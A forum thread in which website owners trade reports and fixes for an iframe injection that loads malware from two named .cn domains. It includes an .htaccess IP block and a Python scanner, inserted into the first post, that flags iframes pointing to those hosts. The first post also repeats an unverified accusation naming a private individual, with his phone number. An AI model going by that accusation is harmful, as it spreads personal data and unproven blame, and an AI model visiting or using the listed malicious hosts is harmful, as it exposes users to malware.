#1
Godson of The Godfather | War Room Member | Join Date: Nov 2004 | Location: The NorthEast Kingdom - Vermont, USA
Posts: 2,163 | Blog Entries: 25 | Thanks: 786 | Thanked 1,064 Times in 441 Posts
Heads up people... Over the past few days, a couple of my sites running WP have been hacked. There is an iframe script inserted into the bottom of a few files (the main index.php, the admin index.php and the theme index.php) which loads up microsotf.cn or updatedate.cn.

Don't go to these sites; it automatically downloads a trojan that AVG does not catch. Avast will catch it, but I still don't suggest going to those sites, unless you want to spend the afternoon removing spyware & trojans from your computer.

After doing some research, this seems to be a fairly new, very nasty virus/spyware/malware/whateverware... that is self-replicating and spreading fast.

"Seems to be originating from the Academy of Sciences, Federation of Russia (their equivalent to our ITT Tech) using their campus servers in Kazakhstan and Latvia before running through the European Union then jumping the Atlantic to here. The student is Nevdomskiy Alexey Alexeevich and can be reached at +79024883214"

Apparently, it is not a WordPress exploit, since I have found others running forum software who have also been compromised. It seems this is an FTP exploit, possibly from spyware on your computer or from compromised files on your server that captures your FTP user/pass somehow.

One tip is that you should not have the same password for your MySQL database, because that is typically stored in plain text in most config files. If a hacker can read your config files somehow, and you use the same SQL pass as your FTP password, well, then they know your FTP pass. Not good.

I have not found the exact solution; I have tried everything suggested. One of my sites that was infected was fairly new, so I deleted EVERYTHING, changed my FTP & MySQL passwords, installed a fresh version of WordPress, and the next day, the iframe hack came back.

I just blocked the IP address 91.212.198.37 in .htaccess:

    order allow,deny
    deny from 91.212.0
    allow from all

I'll report back if the iframes are back tomorrow after blocking that IP range.

Here are some links to some good discussions about this iframe hack:
- Web site hack loading microsotf.cn | Geeked Info
- Website hack – microsotf.cn – Wordpress | Web Design, Raleigh NC - Matt Swanner

Here is an older article/blog post; it does not mention these new .cn domains, but still good info:
- Malicious "Income" IFrames from .CN Domains | Unmask Parasites. Blog.

Does anyone have any additional information about this hack and how to eliminate this threat 100%?

.jrd
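A defender-side check for the injection described in this post: a scan that walks a web root and reports any <iframe> pointing at the two hosts named above, or any zero-size/CSS-hidden iframe pointing anywhere, with file and line number. This is an added example, not code from the post or from WordPress; the sample files it builds are constructed, and the hidden-iframe heuristic is an assumption about how injected frames usually look.

```python
import re
import tempfile
from pathlib import Path

# Hosts named in the thread as iframe targets; extend with any you find in your own files.
KNOWN_BAD_HOSTS = ("microsotf.cn", "updatedate.cn")

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?\s*(?:https?:)?//([^/"'\s>]+)""", re.IGNORECASE)
# Zero-size or CSS-hidden frames are the usual shape of an injected iframe (assumption).
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*=\s*["']?0\b|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.IGNORECASE)

def scan_text(text):
    """Return [(line_no, host, reason)] for every suspicious <iframe> in text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for tag in IFRAME_RE.findall(line):
            m = SRC_RE.search(tag)
            host = m.group(1).lower() if m else ""
            if any(host == bad or host.endswith("." + bad) for bad in KNOWN_BAD_HOSTS):
                hits.append((lineno, host, "known malicious host"))
            elif HIDDEN_RE.search(tag):
                hits.append((lineno, host, "hidden iframe"))
    return hits

def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Walk a web root (e.g. a WordPress install) and map relative path -> hits."""
    root = Path(root)
    findings = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings

def demo():
    """Constructed WordPress-like tree: one clean index.php, one with the injection appended."""
    with tempfile.TemporaryDirectory() as tmp:
        wp = Path(tmp)
        (wp / "wp-admin").mkdir()
        (wp / "index.php").write_text("<?php require 'wp-blog-header.php'; ?>\n")
        (wp / "wp-admin" / "index.php").write_text(
            "<?php /* constructed sample, not a real wp-admin file */ ?>\n"
            '<iframe src="http://microsotf.cn/in.php" width=0 height=0></iframe>\n')
        return scan_tree(wp)

if __name__ == "__main__":
    for path, hits in demo().items():
        for lineno, host, reason in hits:
            print(f"{path}:{lineno}: {reason} ({host or 'no src'})")
```

Run it against a copy of the site taken over SFTP rather than on the live box, and treat any hit on index.php files as a signal to rotate credentials from a machine you trust, not just to delete the line.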
#2
Advanced Warrior | Join Date: May 2007 | Location: Hong Kong.
Posts: 960 | Thanks: 3 | Thanked 173 Times in 153 Posts
Jared, hi, I'm really sorry to hear you got hacked like that. That's a real bummer.

I don't have any extra info on these iframe attacks, but it does emphasise the need to use SFTP, rather than FTP. I recently changed my hosting provider because the one I was using before did not support SFTP and, despite several requests from me, couldn't give a deadline by when they would support it. SFTP support should be a primary consideration in anyone's selection of a hosting provider, especially as most FTP clients support it.

Having said that, if a hacker is determined to access your site they will. But taking the precautions I've set out in this article will help to prevent the mass bot attacks: http://www.wealthydragon.com/blog/20...ten-left-open/

Cheers, Martin.
#3
Paul Mabry-Gravity Sucks | War Room Member | Join Date: Feb 2007 | Location: , , USA.
Posts: 422 | Blog Entries: 2 | Thanks: 85 | Thanked 117 Times in 42 Posts
Hi Jared, sorry to hear about all this, it's just awful! I use the I-Frame Buster WordPress Plugin to great effect. It will help protect your WordPress blog from future iframe hijackers, i.e. DiggBar users and other such cretins.

Hope this helps,
Paul
#4
No excuses - Just do it | War Room Member | Join Date: Mar 2009 | Location: Sydney
Posts: 3,284 | Thanks: 758 | Thanked 1,345 Times in 673 Posts
If this is the virus that I had, it's a nightmare. The virus lies dormant on your local machine, "listening" for any FTP activity. As soon as you FTP up to ANY site from the infected workstation, it detects the username and password, then goes about overwriting ANY index files. I never found a fix, a patch, or even any antivirus that would get rid of it. I had to blow my machine away and reinstall the OS. Changing passwords etc. is useless, because as soon as you FTP again, the cycle repeats.
#5
No excuses - Just do it | War Room Member | Join Date: Mar 2009 | Location: Sydney
Posts: 3,284 | Thanks: 758 | Thanked 1,345 Times in 673 Posts
Actually from memory this has to do with an Adobe vulnerability. Be sure to update your readers to the latest version.
#6
Banned | Join Date: Jul 2009
Posts: 38 | Thanks: 1 | Thanked 3 Times in 3 Posts
My sites were also hacked just like this. I agree with ramone johnny that this situation can happen when your computer is infected with a virus. I have cleaned my PC and installed a fresh copy of Windows, so now it does not happen again.
#7
Senior Warrior Attorney | War Room Member | Join Date: Jul 2004 | Location: Jedi Temple
Posts: 2,902 | Blog Entries: 32 | Thanks: 70 | Thanked 2,175 Times in 639 Posts
That iframe attack is a real bear to track down and it commonly avoids detection by antivirus software. Fortunately, your web host should be able to automatically and quickly clean up the files. Here are suggestions from Hostgator:

"From our experience with malware of this nature, the user account passwords are compromised through viruses/malware located on your local computer. This malware sniffs out passwords used and stored by FTP programs located on the computer. In order to protect against future attack, you will need to run full virus and malware scans on your computers to ensure that they are clean. I recommend using multiple scanners as we have found that some scanners do not detect the malware. MalwareBytes (Malwarebytes.org) and ComboFix (A guide and tutorial on using ComboFix) have been reported to be able to clean this malware. Once this is done, please change all account passwords."

My suggestion - run both. It's always fascinating, and a little disturbing, to see new viruses / malware detected by different anti-virus programs.
#8
HyperActive Warrior | Join Date: Mar 2003 | Location: Kansas City, MO, USA
Posts: 224 | Thanks: 7 | Thanked 1 Time in 1 Post
I went through this a year ago and documented it pretty well here: Sites and Cpanel Hacked with prevedvsem123.cn Virus | Stephan Miller. It turned out with this one that the iframes were even in cPanel and infected the whole bank of dedicated servers. I ended up moving to a new host. Hopefully that is not the case here.
#9
Advanced Warrior | War Room Member | Join Date: Jan 2005 | Location: Iowa City, IA USA
Posts: 811 | Thanks: 86 | Thanked 52 Times in 41 Posts
You have my sympathies. I have also relatively recently dealt with my sites being hacked. Either the hacker is getting to your sites via a vulnerability in your hosting or a vulnerability in your local machine. You'll have to determine which it is. If you eliminate hosting, then it may be necessary to reformat your hard drive and reinstall your software. That's the only way you'll be 100% sure that the malware is off your machine. Following that, be sure to keep a firewall and antivirus software running at all times.

Evan
#10
Advanced Warrior | War Room Member | Join Date: Jan 2003 | Location: Belfast, Ireland.
Posts: 851 | Thanks: 22 | Thanked 59 Times in 46 Posts
Yes, this happened to a lot of my sites recently. I got infected shortly after doing some work on a friend's computer. I didn't use FTP, but I did log into cPanel. After changing my password and amending the infected files from my own computer, it hasn't come back.